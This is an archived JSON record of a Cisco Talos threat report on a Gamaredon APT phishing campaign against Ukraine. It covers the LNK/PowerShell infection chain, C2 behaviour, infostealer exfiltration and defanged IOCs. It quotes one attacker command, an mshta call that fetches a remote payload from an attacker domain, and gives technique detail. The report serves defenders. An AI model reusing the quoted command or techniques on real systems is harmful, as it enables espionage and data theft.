{ "id": "5b23bb0a-7873-48ec-9159-893fbc21743d", "created_at": "2026-04-06T00:16:19.076681Z", "updated_at": "2026-04-10T03:37:04.176812Z", "deleted_at": null, "sha1_hash": "15b2e5eb8aecb56edbc25e9f76c04afc6603fb9a", "title": "Gamaredon APT targets Ukrainian government agencies in new campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1541764, "plain_text": "Gamaredon APT targets Ukrainian government agencies in new\r\ncampaign\r\nBy Asheer Malhotra\r\nPublished: 2022-09-15 · Archived: 2026-04-05 21:09:07 UTC\r\nThursday, September 15, 2022 09:00\r\nTHIS POST IS ALSO AVAILABLE IN:\r\nУкраїнська (Ukrainian)\r\nCisco Talos recently identified a new, ongoing campaign attributed to the Russia-linked Gamaredon APT\r\nthat infects Ukrainian users with information-stealing malware.\r\nThe adversary is using phishing documents containing lures related to the Russian invasion of Ukraine.\r\nLNK files, PowerShell and VBScript enable initial access, while malicious binaries are deployed in the\r\npost-infection phase.\r\nWe discovered the use of a custom-made information stealer implant that can exfiltrate victim files of interest and\r\ndeploy additional payloads as directed by the attackers.\r\nCisco Talos discovered Gamaredon APT activity targeting users in Ukraine with malicious LNK files distributed\r\nin RAR archives. The campaign, part of an ongoing espionage operation observed as recently as August 2022,\r\naims to deliver information-stealing malware to Ukrainian victim machines and makes heavy use of multiple\r\nmodular PowerShell and VBScript (VBS) scripts as part of the infection chain. The infostealer is a dual-purpose\r\nmalware that includes capabilities for exfiltrating specific file types and deploying additional binary and script-based payloads on an infected endpoint.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 1 of 15\n\nThe adversary uses phishing emails to deliver Microsoft Office documents containing remote templates with\r\nmalicious VBScript macros. These macros download and open RAR archives containing LNK files that\r\nsubsequently download and activate the next-stage payload on the infected endpoint. We observed considerable\r\noverlap between the tactics, techniques and procedures (TTPs), malware artifacts and infrastructure used in this\r\ncampaign and those used in a series of attacks the Ukraine Computer Emergency Response Team (CERT-UA)\r\nrecently attributed to Gamaredon.\r\nWe also observed intrusion attempts against several Ukrainian entities. Based on these observations and\r\nGamaredon's operational history of almost exclusively targeting Ukraine, we assess that this latest campaign is\r\nalmost certainly directly targeting entities based in Ukraine.\r\nAttack Chain\r\nInitial Access\r\nGamaredon APT actors likely gained initial footholds into targeted networks through malicious Microsoft Office\r\ndocuments distributed via email. This is consistent with spear-phishing techniques common to this APT.\r\nMalicious VBS macros concealed within remote templates execute when the user opens the document. The\r\nmacros download RAR archives containing LNK files. The naming convention of the RAR archives in this\r\ncampaign follows a similar pattern:\r\n31.07.2022.rar\r\n04.08.2022.rar\r\n10.08.2022.rar\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 2 of 15\n\nThese compressed archives usually contain just the LNK file. The LNK files and Microsoft Office document\r\nnames contain references pertinent to the Russian invasion of Ukraine:\r\nExecution\r\nOnce opened, the LNKs will attempt to execute MSHTA.EXE to download and parse a remote XML file to\r\nexecute a malicious PowerShell script:\r\nmshta.exe hxxp://a0704093.xsph[.]ru/bass/grudge.xml /f\r\nGamaredon is known to use the domain xsph[.]ru. The servers in this campaign only allow access from IP\r\naddresses inside the Ukrainian address space.\r\nThis PowerShell script decodes and executes a second PowerShell script (instrumentor), which collects data from\r\nthe victim and reports back to a remote server. This script also allows the remote server to send a PowerShell\r\ncommand or binary blob containing encrypted VBScript (VBS) code to be executed locally:\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 3 of 15\n\nSecond-stage PowerShell script that runs additional commands and payloads on the endpoint.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 4 of 15\n\nThe instrumentor PowerShell script usually consists of a function that decodes the encrypted response from the\r\ncommand and control (C2) server and executes it as a VBScript object. The key used in the XOR decoder is\r\ncalculated based on the machine's volume serial number plus index parameters passed in the response blob. This\r\nmethod makes it difficult to decode the malicious content if an observer looking at the data doesn't have both\r\nparameters available.\r\nThe PowerShell script also repeatedly captures the current user's screen. This code uses the\r\n\"System.Windows.Forms\" object to capture a copy of the virtual desktop, including setups with multiple screens.\r\nThe screen capture is executed nine times, but the resulting screenshot is always saved to \"%TEMP%\\test.png\",\r\nwhich gets overwritten every time. The resulting image (PNG file) is then converted to a base64-encoded string,\r\nstored in a variable and the screenshot image file is removed from the disk.\r\nThe script then proceeds to upload the victim's information to the remote server. The following information is then\r\ncollected and exfiltrated to a hardcoded C2 URL.\r\nComputer name.\r\nVolume serial number.\r\nBase64-encoded screenshot.\r\nUpon sending the system information, the server response is parsed to see if there are commands to be executed.\r\nThe entire script runs up to four times, thus up to four different commands can be executed each time.\r\nThe code checks if the first character is an exclamation point (\"!\"). If so, the remainder of the response is expected\r\nto be a PowerShell code that is passed directly to the command IEX. The output of that command is then added to\r\nthe variable \"cmd\" and sent back to the C2 server.\r\nIf the response starts with any other character, it is treated as an encrypted blob and passed to the decoder\r\nfunction, along with the volume serial number to be decoded and executed as VBScript.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 5 of 15\n\nInfection chain diagram.\r\nPayloads\r\nYet another PowerShell script\r\nOne of the payloads served to the instrumentor script was PowerShell code used to set an environmental variable\r\nwith PowerShell code in it and a Registry RUN key to run every time the user logs in.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 6 of 15\n\nPowerShell script setting up the RUN key to execute another PowerShell script stored in the\r\nenvironment variable.\r\nThere are two key components to this script:\r\nThe Get-IP function: This function queries a DNS lookup service for an attacker-specified domain and uses\r\none of the returned IP addresses as the IP to download the next payloads.\r\nNext-stage payload: The PowerShell script uses the IP address to construct a URL that serves the next-stage PowerShell script, which is subsequently stored in \"$env:Include\" and executed when the user logs in\r\n(via the HKCU\\\\Run key).\r\nPersistence script fetching the remote location's IP.\r\nThe PowerShell code residing in the environment variable is meant to provide the attackers with continued access\r\nto the infected endpoint with the capability to deploy additional payloads as desired. A similar PowerShell script\r\nwas described in CERT-UA's recent alert describing intrusions conducted by Gamaredon in the first half of 2022\r\nusing the GammaLoad and GammaSteel implants.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 7 of 15\n\nPowerShell script stored in the env variable.\r\nThis script uses the same Get-IP() function to get a random IP assigned to the domain and queries a URL\r\nconstructed from the IP address and a hardcoded extended resource. Just like the previous script, the computer\r\nname and volume serial number are used again in communications with the C2 server. The C2 server uses them to\r\nencode the next-stage payload subsequently served to the script.\r\nIf the response from the C2 starts with the string \"http\", the content is treated as the URL to download the final\r\npayload binary. The Volume Serial Number and Computer Name are passed to this URL and the response is\r\ndecoded using the XorBytes function.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 8 of 15\n\nPowerShell function used to decode payloads from C2 server.\r\nThe decrypted binary is then saved to the \"%TEMP%\" folder with a name consisting of a random string of\r\nnumbers and the \".exe\" file extension and is executed.\r\nAlternatively, if the response from the C2 does not begin with the \"http\" string, the content is treated as a VBS and\r\nexecuted via a COM object.\r\nInfostealer\r\nOne of the executables deployed by the attackers via the PowerShell script consisted of an information stealer that\r\nexfiltrates files of specific extensions from the infected endpoint: .doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf,\r\n.ps1, .rar, .zip, .7z and .mdb. This is a new infostealer that Gamaredon has not previously used in other campaigns.\r\nWe suspect it may be a component of Gamaredon's \"Giddome'' backdoor family, but we are unable to confirm that\r\nat this time.\r\nThe malicious binary keeps track of what has been exfiltrated in a file named \"profiles_c.ini\" in the\r\n\"%USERPROFILE%\\Appdata\\Local\" folder. The malware stores the MD5 hash of a string containing the\r\nfilename, file size and modification date of the exfiltrated file.\r\nOnce started, the malware scans all attached storage devices looking for files with the aforementioned extensions.\r\nFor each one, the malware makes a POST request with metadata about the exfiltrated file and its content.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 9 of 15\n\nPOST data to exfiltrate files.\r\nThe parameter \"p\" contains metadata about the stolen file and the victim machine using the following format:\r\n%u\u0026\u0026%s\u0026\u0026%s\u0026\u0026%s\u0026\u0026%s\u0026\u0026%s\r\nWhere the various parameters are:\r\n\u003cHard_coded_value\u003e\u0026\u0026\u003cFile_name\u003e\u0026\u0026\u003cFile_Modification_Date_time\u003e\u0026\u0026\u003cFileSize\u003e\u0026\u0026__\u0026\u0026\r\n\u003cComputer_Name\u003e\u0026\u0026\u003cUsername\u003e\u0026\u0026\u003cVictim_ID_randomly_generated_string_12_chars\u003e\u0026\u0026\u003cVolume Serial\r\nNumber\u003e\r\nThe raw content of the file comes after the metadata. The request is made to a random URI under the parent C2\r\ndomain. The implant generates a random 12-character string that acts as a subdomain for the C2 domain to send\r\nrequests to:\r\nE.g. \u003crandom_12_char_string\u003e[.]celticso[.]ru\r\nThe implant will also search for the relevant file extensions in fixed and remote drives and specifically in the\r\n\"C:\\Users\" folder. The implant enumerates all the files recursively in the directories on the system while avoiding\r\nenumeration of any folder containing the following strings in the path:\r\nprogram files\r\nprogram files (x86)\r\nprogramdata\r\nperflogs\r\nprog\r\nwindows\r\nappdata\r\nlocal\r\nroaming\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 10 of 15\n\nAvoiding these folders is likely an attempt by the malware to avoid exfiltrating system files thereby focussing on\r\nuser files of interest only.\r\nFor each file exfiltrated to the C2, the implant calculates the MD5 hash for the following information and stores it\r\nin the \"%LocalAppData%\\profiles_c.ini\" file:\r\n\u003cfile_path\u003e\u003cFile_size\u003e\u003cFile_modification_date_time\u003e\r\nThe implant also steals files from removable drives connected to the infected endpoint. When the implant finds a\r\nremovable drive, it looks for files with the file extensions listed earlier. Once a file is found, the implant creates a\r\nrandomly named folder in the %TEMP% directory and copies the original file from its original location to:\r\n%Temp%\\\u003crandomly_named_folder\u003e\\connect\\\u003cremovable_vol_serial_number\u003e\\\u003coriginal file path\u003e\r\nFor example, a user file found in a remote drive \"E:\" at path \"E:\\top_secret_docs\\isengard.doc\" will be copied to\r\n\"%temp%\\randomly_named_folder\\connect\\\u003cremovable_vol_serial_number\u003e\\top_secret_docs\\isengard.doc\"\r\nThe contents of the folder in the temp directory are subsequently exfiltrated to the C2.\r\nDeliver payloads\r\nAs with this actor's previous tools (e.g., the PS1 scripts), this binary also parses the server response and downloads\r\nadditional payloads if requested. The response from the server consists of a flag indicating how the data should be\r\ntreated:\r\nFlag Payload Type Action\r\n1 EXE Written to disk and executed.\r\n2 VBS Written to disk and executed using wscript.exe.\r\nAny other value Blob of data Written to a file on disk in the %TEMP% folder.\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 11 of 15\n\nCode depicting the dropping of additional payloads.\r\nThere are other indications this malware may be present on the system, listed below:\r\nA registry key is created under HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the\r\nname \"Windows Task\" for persistence\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 12 of 15\n\nA mutex is created with the name Global\\flashupdate_r\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. Snort Rules 60517-60539 are available for this threat.\r\nOrbital Queries\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 13 of 15\n\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints\r\nare infected with this specific threat. For specific OSqueries on this threat, click here and here.\r\nIOCs\r\nThe IOC list is also available in Talos' Github repo here.\r\nMalicious\r\nDocuments4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650\r\nLNK\r\nFiles581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a\r\n34bf1a232870df28809597d49a70d9b549d776e1e4beb3308ff6d169a59ecd02\r\n78c6b489ac6cebf846aab3687bbe64801fdf924f36f312802c6bb815ed6400ba\r\n1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447\r\na9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7\r\n8294815c2342ff11739aff5a55c993f5dd23c6c7caff2ee770e69e88a7c4cb6a\r\nbe79d470c081975528c0736a0aa10214e10e182c8948bc4526138846512f19e7\r\n5264e8a8571fe0ef689933b8bc2ebe46b985c9263b24ea34e306d54358380cbb\r\nff7e8580ce6df5d5f5a2448b4646690a6f6d66b1db37f887b451665f4115d1a2\r\n1ec69271abd8ebd1a42ac1c2fa5cdd9373ff936dc73f246e7f77435c8fa0f84c\r\nRAR\r\nFiles750bcec54a2e51f3409c83e2100dfb23d30391e20e1c8051c2bc695914c413e3\r\nInfostealer\r\n139547707f38622c67c8ce2c026bf32052edd4d344f03a0b37895b5de016641a\r\nMalicious URLs\r\nhxxp://a0698649.xsph[.]ru/barley/barley.xml\r\nhxxp://a0700343.xsph[.]ru/new/preach.xml\r\nhxxp://a0700462.xsph[.]ru/grow/guests.xml\r\nhxxp://a0700462.xsph[.]ru/seek/lost.xml\r\nhxxp://a0701919.xsph[.]ru/head/selling.xml\r\nhxxp://a0701919.xsph[.]ru/predator/decimal.xml\r\nhxxp://a0701919.xsph[.]ru/registry/prediction.xml\r\nhxxp://a0704093.xsph[.]ru/basement/insufficient.xml\r\nhxxp://a0704093.xsph[.]ru/bass/grudge.xml\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 14 of 15\n\nhxxp://a0705076.xsph[.]ru/ramzeses1.html\r\nhxxp://a0705076.xsph[.]ru/regiment.txt\r\nhxxp://a0705269.xsph[.]ru/bars/dearest.txt\r\nhxxp://a0705269.xsph[.]ru/instruct/deaf.txt\r\nhxxp://a0705269.xsph[.]ru/prok/gur.html\r\nhxxp://a0705581.xsph[.]ru/guinea/preservation.txt\r\nhxxp://a0705880.xsph[.]ru/band/sentiment.txt\r\nhxxp://a0705880.xsph[.]ru/based/pre.txt\r\nhxxp://a0705880.xsph[.]ru/selection/seedling.txt\r\nhxxp://a0706248.xsph[.]ru/reject/headlong.txt\r\nhxxp://a0707763.xsph[.]ru/decipher/prayer.txt\r\nAdditional Payload Drop Sites\r\nhxxp://155.138.252[.]221/get.php\r\nhxxp://45.77.237[.]252/get.php\r\nhxxp://motoristo[.]ru/get.php\r\nhxxp://heato[.]ru/index.php\r\nhxxps://\u003crandom_string\u003e.celticso[.]ru\r\n162[.]33[.]178[.]129\r\nkuckuduk[.]ru\r\npasamart[.]ru\r\ncelticso[.]ru\r\nSource: https://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nhttps://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/" ], "report_names": [ "gamaredon-apt-targets-ukrainian-agencies" ], "threat_actors": [ { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434579, "ts_updated_at": 1775792224, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/15b2e5eb8aecb56edbc25e9f76c04afc6603fb9a.pdf", "text": "https://archive.orkl.eu/15b2e5eb8aecb56edbc25e9f76c04afc6603fb9a.txt", "img": "https://archive.orkl.eu/15b2e5eb8aecb56edbc25e9f76c04afc6603fb9a.jpg" } }